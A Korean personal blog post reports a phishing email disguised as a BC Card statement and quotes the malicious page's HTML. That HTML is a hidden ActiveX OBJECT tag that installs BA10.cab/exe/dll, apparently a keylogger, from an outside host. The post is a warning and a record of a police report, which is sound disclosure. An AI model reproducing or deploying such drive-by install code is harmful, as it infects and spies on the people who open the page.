오늘 아침에 아래와 같은 메일을 받았다.
메일 주소가 깨져서 BC Card에서 무슨 실수라도 했나 하고 열었는데 첨부 File도 없었다.
평소 첨부 파일로 명세서를 배달했는데 왜 없지하면서 실수를 했나 하다가
이용대금 명세서 보기라는 부분을 발견 눌렀다.
물론 IE가 아니라서 좌우로 막대가 왔다갔다 하는 화면만 봤지만...
아래는 경찰청 사이버테러 대응센터에 신고한 내용이다.
근데 신고가 피해를 받았을 때만 하도록 되어 있어서 신고하고도 찝찝하다.
난 아직 피해를 받지는 않았으니까...
-------------------------------------------------------------------------------------
가짜 카드 사용 명세서를 보내서 해킹을 시도하였습니다.
명세서 보기를 누르면 http://mail.kibum.co.kr/bccard/bccard.htm 로 가도록 되어 있고
<OBJECT ID="KeySafety" CLASSID="CLSID:93C0C21C-1796-4285-9CC1-C8F5CED8E67A" CodeBase="BA10.cab" WIDTH=0 HEIGHT=0>
<PARAM NAME="Caption" VALUE="http://mail.kibum.co.kr/bccard/BA10.exe">
<PARAM NAME="Text" VALUE="http://mail.kibum.co.kr/bccard/BA10.dll">
</OBJECT>
이런 식으로 해킹 프로그램을 깔도록 되어 있습니다.
위 ba10.exe를 내려 받아서 실행해 본 결과 프로세스에 등록만 되고 어떤 안내도 없습니다.
또한 사용 중인 백신(시큐리티 에센셜)에서 바이러스로 진단하지 않네요.
키로거인 것 같은데 더 이상은 불안해서 프로세스를 죽이고 지웠습니다.
kibum.co.kr에 대한 whois 정보로는 XXX이라는 사람이 책임자이고,
XX시스템주식회사에서 등록 대행을 하였습니다.
'쓸만한 주저리' 카테고리의 다른 글
윈도우7 설치후 업데이트가 안될 때 - v3lite 문제 (0) | 2010.10.06 |
---|---|
Google의 HTML5 Presentation (0) | 2010.06.30 |
nfupload+freeASPupload=aspuploader ??? (0) | 2010.06.22 |
NFUpload : 무료 ASP Upload Component - 진행바 지원 (0) | 2010.06.21 |
aspuploader가 유료라 찾은 Free ASP Upload입니다. (0) | 2010.06.21 |